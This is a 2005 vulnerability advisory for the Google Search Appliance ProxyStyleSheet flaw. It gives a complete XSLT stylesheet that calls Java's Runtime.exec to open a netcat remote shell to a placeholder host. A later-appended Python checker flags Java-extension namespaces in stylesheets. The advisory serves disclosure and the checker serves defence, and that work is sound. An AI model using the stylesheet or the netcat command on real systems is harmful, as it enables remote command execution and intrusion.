

Title: Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities
Published: 2005-11-21-12:00AM
Updated: 2005-11-21-06:45PM
Class: Design Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: No
Credit: H D Moore <hdm@metasploit.com> is credited with the discovery of these issues.
Vulnerable: Google Search Appliance
            Google Mini Search Appliance
Not Vulnerable:
Code: An exploit is not required to leverage these issues. An example style sheet sufficient to execute commands has been provided:

<xsl:template
name="my_page_footer"
xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
>

<!-- Google Mini XSLT Code Execution [metasploit] -->

XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />

Executing command...<br />
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />
</span>
</xsl:template>

An exploit for the Metasploit Framework is also available: /data/vulnerabilities/exploits/google_proxystylesheet_exec.pm
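
A defender-side check for the stylesheet pattern above, as an added example (not from the original advisory, its author, or Google): it lists the namespace declarations in a submitted stylesheet and rejects any that bind a prefix to a Java class. The function name, the allowlist policy and both sample stylesheets are assumptions constructed here; the Xalan and `java:` URI forms go beyond the Oracle form shown on this page.

```python
import io
import xml.etree.ElementTree as ET

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
# Namespaces a submitted stylesheet may declare (assumed site policy).
ALLOWED_NS = {XSLT_NS, "http://www.w3.org/1999/xhtml"}
# URI forms that bind a prefix to a Java class. The first is the form used on
# this page; the Xalan and "java:" forms generalize beyond it.
JAVA_BINDINGS = (
    "http://www.oracle.com/XSL/Transform/java/",
    "http://xml.apache.org/xalan/java",
    "java:",
)

def audit_stylesheet(xml_text):
    """Return (verdict, findings) for a stylesheet without transforming it."""
    findings = []
    try:
        events = ET.iterparse(io.BytesIO(xml_text.encode("utf-8")), events=("start-ns",))
        for _, (prefix, uri) in events:
            if uri.startswith(JAVA_BINDINGS):
                findings.append(("java-extension", prefix, uri))
            elif uri not in ALLOWED_NS:
                findings.append(("unlisted-namespace", prefix, uri))
    except ET.ParseError as exc:
        # Input that is not well-formed XML is rejected rather than guessed at.
        findings.append(("not-well-formed", "", str(exc)))
    return ("reject" if findings else "accept"), findings

# Constructed samples: same namespace bindings as the page, harmless bodies.
SUSPECT = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template name="my_page_footer"
  xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
  xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime">
<p>footer</p>
</xsl:template>
</xsl:stylesheet>"""

BENIGN = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template name="my_page_footer"><p>footer</p></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, doc in (("SUSPECT", SUSPECT), ("BENIGN", BENIGN)):
        print(name, audit_stylesheet(doc))
```

Treat this as a pre-filter in front of the transform; the XSLT processor itself should still run with Java extension functions disabled.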
Copyright 2007, SecurityDot
Sat, 19 Dec 2009 03:11:18 +0000